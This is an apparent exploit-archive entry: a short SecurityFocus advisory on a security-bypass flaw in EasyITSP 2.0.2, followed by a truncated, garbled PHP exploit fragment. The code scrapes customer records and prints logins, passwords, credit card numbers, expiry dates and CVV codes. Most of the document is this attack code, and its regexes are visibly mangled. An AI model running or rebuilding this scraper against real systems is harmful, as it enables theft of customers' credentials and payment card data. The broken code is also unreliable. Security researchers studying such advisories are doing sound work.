source: https://www.securityfocus.com/bid/56321/info EasyITSP is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and gain unauthorized access to customer's information. EasyITSP 2.0.2 is vulnerable; other versions may also be affected. (.+?)\<\/td\>#s'; preg_match($regex_login, $intro, $login); $regex_pass = '#\\<\/td\>#s'; preg_match($regex_pass, $intro, $pass); $regex_ccnum = '#\\<\/td\>#s'; preg_match($regex_ccnum, $intro, $ccnum); $regex_ccexpire = '#\\<\/td\>#s'; preg_match($regex_ccexpire, $intro, $ccexpire); $regex_cccvv = '#\\<\/td\>#s'; preg_match($regex_cccvv, $intro, $cccvv); $test = explode(" ",$login[1]); if(trim($test[0])!='') { echo 'ID:'.$id_pod."\n"; echo 'LOGIN:'.$login[1]."\n"; echo 'Password:'.$pass[1]."\n"; echo 'CCnumber:'.$ccnum[1]."\n"; echo 'CCexpire:'.$ccexpire[1]."\n"; echo 'CCCVV:'.$cccvv[1]."\n\n"; } } ?>